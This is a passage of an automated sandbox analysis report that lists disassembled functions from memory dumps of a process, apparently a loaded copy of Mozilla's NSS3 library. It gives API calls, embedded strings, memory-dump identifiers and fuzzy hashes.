                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                              • String ID:
                                                              • API String ID: 1923011919-0
                                                              • Opcode ID: 4b7db0da5ead685a1d1b2bb400dbc3180fd20bfe0ae50b47333963d49dabcaa3
                                                              • Instruction ID: f69614a2c33ed9a8a78fa1115fcfa95520d0b5bcfdd8230dc80e7776dff73009
                                                              • Opcode Fuzzy Hash: 4b7db0da5ead685a1d1b2bb400dbc3180fd20bfe0ae50b47333963d49dabcaa3
                                                              • Instruction Fuzzy Hash: 4EC170B1D0421A9BEB61CF14CC40FEEB7B8BF19308F5181E5E918A6241E7719E86CF91
                                                              Function 6D126C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6D0D1C6F,00000000,00000004,?,?), ref: 6D126C3F
                                                                • Part of subcall function 6D17C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D17C2BF
                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6D0D1C6F,00000000,00000004,?,?), ref: 6D126C60
                                                              • PR_ExplodeTime.NSS3(00000000,6D0D1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6D0D1C6F,00000000,00000004,?,?), ref: 6D126C94
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                              • String ID: gfff$gfff$gfff$gfff$gfff
                                                              • API String ID: 3534712800-180463219
                                                              • Opcode ID: a87ea4403c5fa8a0d61c88fced95d13d804c0867a8cb31aa5e24adc0ee1dccd8
                                                              • Instruction ID: dde5da6a54dec18aba7bae236b62fca41f8573f865112a48a9e0d07686269863
                                                              • Opcode Fuzzy Hash: a87ea4403c5fa8a0d61c88fced95d13d804c0867a8cb31aa5e24adc0ee1dccd8
                                                              • Instruction Fuzzy Hash: 76515A72B016094FC708CDADDC527DEB7DAABA4310F48C23AE842DB785D679D902C751
                                                              Function 6D13BD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6D13BD48
                                                              • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6D13BD68
                                                              • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6D13BD83
                                                              • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6D13BD9E
                                                              • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6D13BDB9
                                                              • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6D13BDD0
                                                              • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6D13BDEA
                                                              • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6D13BE04
                                                              • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6D13BE1E
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: AlgorithmPolicy
                                                              • String ID:
                                                              • API String ID: 2721248240-0
                                                              • Opcode ID: 0eb410021889e04f80ad42f3d532b2a4d655f4164f5439cc9dfaa2b9a6466337
                                                              • Instruction ID: 6e59672f6ac9a8fe8936dfeaff08b158d986b930e6b6d1fd1c578999f4d453c0
                                                              • Opcode Fuzzy Hash: 0eb410021889e04f80ad42f3d532b2a4d655f4164f5439cc9dfaa2b9a6466337
                                                              • Instruction Fuzzy Hash: 6621F566E4467F57FB004A56DE43F6B32B49BA1769F070024FA1AEE149F3A09414C3A2
                                                              Function 6D1E8D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_CallOnce.NSS3(6D2314E4,6D19CC70), ref: 6D1E8D47
                                                              • PR_GetCurrentThread.NSS3 ref: 6D1E8D98
                                                                • Part of subcall function 6D0C0F00: PR_GetPageSize.NSS3(6D0C0936,FFFFE8AE,?,6D0516B7,00000000,?,6D0C0936,00000000,?,6D05204A), ref: 6D0C0F1B
                                                                • Part of subcall function 6D0C0F00: PR_NewLogModule.NSS3(clock,6D0C0936,FFFFE8AE,?,6D0516B7,00000000,?,6D0C0936,00000000,?,6D05204A), ref: 6D0C0F25
                                                              • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6D1E8E7B
                                                              • htons.WSOCK32(?), ref: 6D1E8EDB
                                                              • PR_GetCurrentThread.NSS3 ref: 6D1E8F99
                                                              • PR_GetCurrentThread.NSS3 ref: 6D1E910A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                              • String ID: %u.%u.%u.%u
                                                              • API String ID: 1845059423-1542503432
                                                              • Opcode ID: b96c7d26fd446606c18f32aecf7fc8a858bf9751edc5b9fb8240602f5bc9da32
                                                              • Instruction ID: 15c6a945914a20c5cc7afebe64823ab9d844e5613b184a05dabded99d4772d5d
                                                              • Opcode Fuzzy Hash: b96c7d26fd446606c18f32aecf7fc8a858bf9751edc5b9fb8240602f5bc9da32
                                                              • Instruction Fuzzy Hash: 5C02B971A04A528FDB19CF18C47837ABBB3EF96390F0AC259D8919B2D9C3B1D945C790
                                                              Function 6D1A9D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6D068637,?,?), ref: 6D1A9E88
                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6D068637), ref: 6D1A9ED6
                                                              Strings
                                                              • %s at line %d of [%.10s], xrefs: 6D1A9ECF
                                                              • database corruption, xrefs: 6D1A9ECA
                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D1A9EC0
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: _byteswap_ulongsqlite3_log
                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                              • API String ID: 912837312-598938438
                                                              • Opcode ID: 33892cf18c444b29c8daf2664cc7ccdf646581d203f8c3e4e335ed1987b92b0b
                                                              • Instruction ID: b6fa0e338e2416a1412bfd1b6185783c0fc1317646c674197c0bbd534204cf90
                                                              • Opcode Fuzzy Hash: 33892cf18c444b29c8daf2664cc7ccdf646581d203f8c3e4e335ed1987b92b0b
                                                              • Instruction Fuzzy Hash: 7E81E935B402168FDB04CF69C990AEEB7F6FF48314F498029E915AB246D7B1EE85CB50
                                                              Function 6D1ECDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D1ED086
                                                              • PR_Malloc.NSS3(00000001), ref: 6D1ED0B9
                                                              • PR_Free.NSS3(?), ref: 6D1ED138
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: FreeMallocstrlen
                                                              • String ID: >
                                                              • API String ID: 1782319670-325317158
                                                              • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                              • Instruction ID: 87c4b7a09977f375f4aa5be783fa46988b33614cab6f2ac858de0194afebe2d3
                                                              • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                              • Instruction Fuzzy Hash: 0DD128A2B50D470BEB1545788CA13EABB9397D23F0F584329D521CB3EDE5E988838341
                                                              Function 6D18AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d357f2aa78b145225cef5ba00b96104e2e84201b908c24fc6b65ccff368a13cb
                                                              • Instruction ID: 6bb3ffdcdb42355dda6b064bcc694c3e74f256e6c6d9a597da489805faac80c7
                                                              • Opcode Fuzzy Hash: d357f2aa78b145225cef5ba00b96104e2e84201b908c24fc6b65ccff368a13cb
                                                              • Instruction Fuzzy Hash: D5F1D670E002568FEB15CF28C5487BB77F1BB9A308F054129E915E7359E7B49A52CF81
                                                              Function 6D1A0C40 Relevance: .1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7e4d032a22b2a074d2f814c85c58025d5193db35947e71249d1a5cb93825cb04
                                                              • Instruction ID: 45f0effdfe4ae3513659a9f800252c9faf6c206d9e84429e8f3e33d04151bcca
                                                              • Opcode Fuzzy Hash: 7e4d032a22b2a074d2f814c85c58025d5193db35947e71249d1a5cb93825cb04
                                                              • Instruction Fuzzy Hash: 2411E7387043068FDB10DF29D88466677B1FF85364F1980ADD8198B34DDBB2E906CB90
                                                              Function 6D1A0D60 Relevance: .0, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                              • Instruction ID: ade1faed42fade384a53e182ef1398babd0bdb705831944ab968a5f8494dbb9b
                                                              • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                              • Instruction Fuzzy Hash: 74E06D3F200015A7DB148E0AC450AA9735AEF91655FA98079FC5DEBA09D673F8038781
                                                              Function 6D0CCC60 Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: af874973f7f80435a29e5574182b52ccff852fd63598d5cfb47c0f4614c381d3
                                                              • Instruction ID: 6fd6575eff8c4220ef510d7ff3a24160e2ab2813925d4e88223853743c6d9f61
                                                              • Opcode Fuzzy Hash: af874973f7f80435a29e5574182b52ccff852fd63598d5cfb47c0f4614c381d3
                                                              • Instruction Fuzzy Hash: 53C04838244608CFC708DA08E589AA53BA8AB0D6107050094EA028B721DB22F800CA80
                                                              Function 6D101D60 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6D101D46), ref: 6D102345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Print
                                                              • String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
                                                              • API String ID: 3558298466-1980531169
                                                              • Opcode ID: c6cb3b7842ff9f94fd2945d50d22e7775c3d3ef4d68f76fa66a0f99eca022e33
                                                              • Instruction ID: 70f13bf5e827a297b853ec6e557eef6783e24ea41885eae817ed9a57861f6e4b
                                                              • Opcode Fuzzy Hash: c6cb3b7842ff9f94fd2945d50d22e7775c3d3ef4d68f76fa66a0f99eca022e33
                                                              • Instruction Fuzzy Hash: 406131309DC009C6D636374C89A437CA1BDBB1E304F91C0B7E7858E79DCED98A924693
                                                              Function 6D135DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6D135E08
                                                              • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6D135E3F
                                                              • PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6D135E5C
                                                              • free.MOZGLUE(00000000), ref: 6D135E7E
                                                              • free.MOZGLUE(00000000), ref: 6D135E97
                                                              • PORT_Strdup_Util.NSS3(secmod.db), ref: 6D135EA5
                                                              • _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6D135EBB
                                                              • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6D135ECB
                                                              • PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6D135EF0
                                                              • free.MOZGLUE(00000000), ref: 6D135F12
                                                              • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6D135F35
                                                              • PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6D135F5B
                                                              • free.MOZGLUE(00000000), ref: 6D135F82
                                                              • PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6D135FA3
                                                              • PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6D135FB7
                                                              • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6D135FC4
                                                              • free.MOZGLUE(00000000), ref: 6D135FDB
                                                              • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6D135FE9
                                                              • free.MOZGLUE(00000000), ref: 6D135FFE
                                                              • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6D13600C
                                                              • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D136027
                                                              • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6D13605A
                                                              • PR_smprintf.NSS3(6D20AAF9,00000000), ref: 6D13606A
                                                              • free.MOZGLUE(00000000), ref: 6D13607C
                                                              • free.MOZGLUE(00000000), ref: 6D13609A
                                                              • free.MOZGLUE(00000000), ref: 6D1360B2
                                                              • free.MOZGLUE(?), ref: 6D1360CE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                              • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                              • API String ID: 1427204090-154007103
                                                              • Opcode ID: 29758639cacb247c5e5df041e212af500ff336ef43d4c163e623d071113785c9
                                                              • Instruction ID: 5df4bae83db91e9103f6a91c926a6d39dddd8e295755e13bf91ddbe2ddb1ec77
                                                              • Opcode Fuzzy Hash: 29758639cacb247c5e5df041e212af500ff336ef43d4c163e623d071113785c9
                                                              • Instruction Fuzzy Hash: 199118F09442265FFB118F64DC86B7B7BA8AF16648F0A0060ED559B24AE7B1D910C7F2
                                                              Function 6D0C1D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_NewLock.NSS3 ref: 6D0C1DA3
                                                                • Part of subcall function 6D1998D0: calloc.MOZGLUE(00000001,00000084,6D0C0936,00000001,?,6D0C102C), ref: 6D1998E5
                                                              • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6D0C1DB2
                                                                • Part of subcall function 6D0C1240: TlsGetValue.KERNEL32(00000040,?,6D0C116C,NSPR_LOG_MODULES), ref: 6D0C1267
                                                                • Part of subcall function 6D0C1240: EnterCriticalSection.KERNEL32(?,?,?,6D0C116C,NSPR_LOG_MODULES), ref: 6D0C127C
                                                                • Part of subcall function 6D0C1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6D0C116C,NSPR_LOG_MODULES), ref: 6D0C1291
                                                                • Part of subcall function 6D0C1240: PR_Unlock.NSS3(?,?,?,?,6D0C116C,NSPR_LOG_MODULES), ref: 6D0C12A0
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D0C1DD8
                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6D0C1E4F
                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6D0C1EA4
                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6D0C1ECD
                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6D0C1EEF
                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6D0C1F17
                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D0C1F34
                                                              • PR_SetLogBuffering.NSS3(00004000), ref: 6D0C1F61
                                                              • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6D0C1F6E
                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6D0C1F83
                                                              • PR_SetLogFile.NSS3(00000000), ref: 6D0C1FA2
                                                              • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6D0C1FB8
                                                              • OutputDebugStringA.KERNEL32(00000000), ref: 6D0C1FCB
                                                              • free.MOZGLUE(00000000), ref: 6D0C1FD2
                                                              Strings
                                                              Memory Dump Source
